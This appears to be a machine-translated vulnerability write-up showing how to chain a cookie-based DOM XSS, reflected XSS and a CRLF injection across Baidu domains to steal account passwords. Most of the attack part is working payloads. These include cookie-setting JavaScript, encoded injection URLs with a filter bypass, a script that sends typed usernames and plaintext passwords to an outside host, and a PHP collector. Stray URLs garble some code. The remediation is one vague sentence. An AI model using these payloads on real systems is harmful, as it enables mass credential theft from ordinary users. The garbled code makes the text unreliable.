A critical vulnerability that can steal passwords of Baidu accounts on a large scale (trigger a full-line attack)

A critical vulnerability that can steal passwords of Baidu accounts on a large scale (trigger a full-line attack)

Xss rookit, Baidu basically exists in all core businesses (Baidu Post Bar, Baidu news, Baidu know, Baidu encyclopedia, Baidu music, etc.), triggered once, and completed all moves.

When map.baidu.com is analyzed, it is found that the Code eval executes the cookie PMS_JT value.
 

Test
 

Add the PMS_JT value to alert (http://www.2cto.com/Article/201603/1), the access is successfully executed, determine the dom xss vulnerability that has the cookie source, and form an xss rookit.



After analyzing other Baidu businesses, we found that this is a common problem, and basically all core businesses have this problem.
 

 

 

 

 

 

 

 

 

 

How to reflect the hazards?



Verify again here



First construct and let it execute our remote js to facilitate testing.



Modify PMS_JT

document.write('<script src="//txt888.sinaapp.com/test.js"></script>')

Or
 

var%20element%3Ddocument.createElement%28%27script%27%29%3Belement.setAttribute%28%27src%27%2C%20%27http%3A%2f%2ftxt888.sinaapp.com%2ftest.js%27%29%3Bdocument.getElementsByTagName%28%22head%22%29.item%280%29.appendChild%28element%29%3B

Yes


 

Triggered successfully



You must first trigger this vulnerability by modifying the cookie value. A combination of two vulnerabilities can trigger this vulnerability.



The first method is to use the reflected xss



Here, the automated penetration test of Fuxi has found the xss vulnerability in multiple baidu.com domains. take a test.

Http://m.apistore.baidu.com/astore/mfaqdetail? Tag = 0 & webTitle = APIStore % E4 % BB % 8B % E7 % BB % 8D



Write and modify cookie js first



Baidu_test.js
 

function fSetCookie(c, e, d) {    var a = ";domain=" + d +";path=/" ;    document.cookie = c + "=" + e + a + ";expires=" + new Date(2099, http://www.2cto.com/Article/201603/12, 3http://www.2cto.com/Article/201603/1).toGMTString();}fSetCookie("PMS_JT","document.write('<script src=\"//txt888.sinaapp.com/test.js\"></script>')",".baidu.com")

Construct access
 

http://m.apistore.baidu.com/astore/mfaqdetail/?tag=0&webTitle=APIStore%E4%BB%8B%E7%BB%8D
 

 

Cookie value modified



Tieba.baidu.com is enabled and executed successfully.
 

Continue construction. The target is to steal the plaintext account and password of the user.



First, analyze the logon box
 

When _. Module. use ("common/widget/LoginDialog", ["", "userBar"]) is executed, the logon box is loaded.





Construct stealing code



Baidu_rookit.js


 

Function login_jc () {a = new Image (); a. src = "http://txt888.sinaapp.com/form_save.php? User = "+ document. getElementById ("tangram1_psp_8 _ userName "). value + "& password =" + document. getElementById ("tangram?psp_8 _ password "). value; return true ;}_. module. use ("common/widget/LoginDialog", ["", "userBar"]); # load the login box setTimeout ("document. getElementById (\ "tangram?psp_8 _ form \"). setAttribute (\ "onsubmit \", \ "login_jc (); \") ", 5000); # Add an onsubmit event after 5 seconds

Save code

Form_save.php
 

function insert($data){    $mysql = new SaeMysql();    $sql = "insert into test(`data`,`time`) values('$data',now())";    $mysql->runsql($sql);    $mysql->closeDb();    if ($mysql->errno() != 0){    die("Error:" . $mysql->errmsg());}}if (count($_GET)>=http://www.2cto.com/Article/201603/1){    $data = json_encode($_GET);insert($data);    echo http://www.2cto.com/Article/201603/1;}?>

 

Open the logon test. The logon dialog box is displayed.


 

 

The password is intercepted.



Attackers need to use reflective xss to open the attack link. The success rate and concealment are not enough. Therefore, we use another vulnerability to combine it.



Crlf Vulnerability



Here, the automated penetration test platform of fuyun also finds multiple crlf vulnerabilities in the baidu.com domain and takes one test.



Add cookie test based on vulnerability Construction

Access

Http://wenku.baidu.com: 80/topic/new/href =/% 0aset-cookie: future = future domain = .baidu.com; path =/% 0aa:


 

Successfully set .baidu.com cookie. All subdomains under the root domain can be called. Therefore, you only need to activate the cookie once. All products can be intercepted.



Construct and load the interception script


 

http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:PMS_JT=document.write%28%27%3Cscript%20src%3D%22%2f%2f%2ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29; domain=.baidu.com; path=/%0aa:

 

Set successfully. Open tieba.baidu.com to test.
 

No response was found. Why?



Check again
 

The original // is filtered to/, and thus the remote js cannot be loaded.



How can I bypass it?



We can use double encoding to bypass



Structure
 

http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:PMS_JT=document.write%28%27%3Cscript%20src%3D%22%252f%252ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29; domain=.baidu.com; path=/%0aa:

Access
 

 

Load and execute our truncated code





Because crlf sets cookie TO get request, we can use all the methods that can trigger get request for attacks, such as tag







Test Access
 

Cookie set successfully





That is to say, attackers can insert attack code (images, videos, flash, etc.) wherever they can access external network resources, and steal the account and password while the victim is surfing the Internet.



Test



For example, DZ forums



Post or reply

Insert an image. Enter the address.
 

http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:%20PMS_JT=document.write%28%27%3Cscript%20src%3D%22%252f%252ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29;%20domain=.baidu.com;%20path=/%0aa:#.jpg

Note: All spaces must be converted to % 20


 

Cookie modified


 

Test Logon


 

The user name and plaintext password are intercepted.







The logon boxes of different services vary slightly. The Code intercepted by the above test is only for tieba.baidu.com. To steal the entire line, you need to write and judge and execute different stealing codes.



Organize: Attack processes: insert attack code (images) in places where external resources can be added, such as social forums, posts, and spaces. Victims can view posts or other unintentional attack code on normal forums, once triggered, the user name and password will be intercepted and sent to the address specified by the attacker the next time he logs on to Baidu's vulnerable product.
 

Solution:

Note that variables that can be controlled by users are harmful.